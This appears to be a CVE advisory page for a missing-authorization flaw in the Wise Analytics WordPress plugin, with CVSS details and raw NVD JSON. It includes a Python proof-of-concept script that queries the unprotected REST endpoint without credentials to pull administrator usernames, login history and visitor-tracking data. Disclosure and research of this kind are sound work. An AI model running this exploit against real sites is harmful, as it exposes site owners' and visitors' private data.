Security Vulnerability Report
中文
CVE-2025-14609 CVSS 5.3 MEDIUM

CVE-2025-14609

Published: 2026-01-24 08:16:06
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Wise Analytics plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.1.9. This is due to missing capability checks on the REST API endpoint '/wise-analytics/v1/report'. This makes it possible for unauthenticated attackers to access sensitive analytics data including administrator usernames, login timestamps, visitor tracking information, and business intelligence data via the 'name' parameter granted they can send unauthenticated requests.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Wise Analytics Plugin <= 1.1.9 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-14609 PoC - Unauthenticated Access to Wise Analytics REST API # Target: WordPress site with Wise Analytics plugin < 1.2.0 def exploit_wise_analytics(target_url): """ Exploit for Missing Authorization in Wise Analytics plugin Endpoint: /wp-json/wise-analytics/v1/report """ endpoint = f"{target_url.rstrip('/')}/wp-json/wise-analytics/v1/report" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-14609-PoC)' } # Malicious payload to extract analytics data payload = { 'name': 'admin_users', # Target sensitive data endpoint 'filters': { 'date_range': 'all' } } print(f"[*] Target: {target_url}") print(f"[*] Exploiting endpoint: {endpoint}") try: # Send unauthenticated request response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Success! Retrieved sensitive data:") print(json.dumps(data, indent=2)) return data else: print(f"[-] Request failed with status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None # Alternative: GET request for enumeration def enumerate_data(target_url): """Enumerate available data through the vulnerable endpoint""" endpoint = f"{target_url.rstrip('/')}/wp-json/wise-analytics/v1/report" # Try different data types data_types = ['admin_users', 'login_history', 'visitor_tracking', 'business_intel'] for data_type in data_types: params = {'name': data_type} try: response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Found data type: {data_type}") print(response.text) except: pass if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] exploit_wise_analytics(target) else: print("Usage: python cve-2025-14609.py <target_url>") print("Example: python cve-2025-14609.py http://victim.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14609", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:05.543", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Wise Analytics plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.1.9. This is due to missing capability checks on the REST API endpoint '/wise-analytics/v1/report'. This makes it possible for unauthenticated attackers to access sensitive analytics data including administrator usernames, login timestamps, visitor tracking information, and business intelligence data via the 'name' parameter granted they can send unauthenticated requests."}, {"lang": "es", "value": "El plugin Wise Analytics para WordPress es vulnerable a la falta de autorización en todas las versiones hasta la 1.1.9, inclusive. Esto se debe a la falta de comprobaciones de capacidad en el endpoint de la API REST '/wise-analytics/v1/report'. Esto permite que atacantes no autenticados accedan a datos analíticos sensibles, incluyendo nombres de usuario de administrador, marcas de tiempo de inicio de sesión, información de seguimiento de visitantes y datos de inteligencia de negocio, a través del parámetro 'name', siempre que puedan enviar solicitudes no autenticadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wise-analytics/tags/1.1.9/src/Endpoints/ReportsEndpoint.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wise-analytics/trunk/src/Endpoints/ReportsEndpoint.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3446670/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d92c80cb-080b-4774-8c66-1d5cf68e771f?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.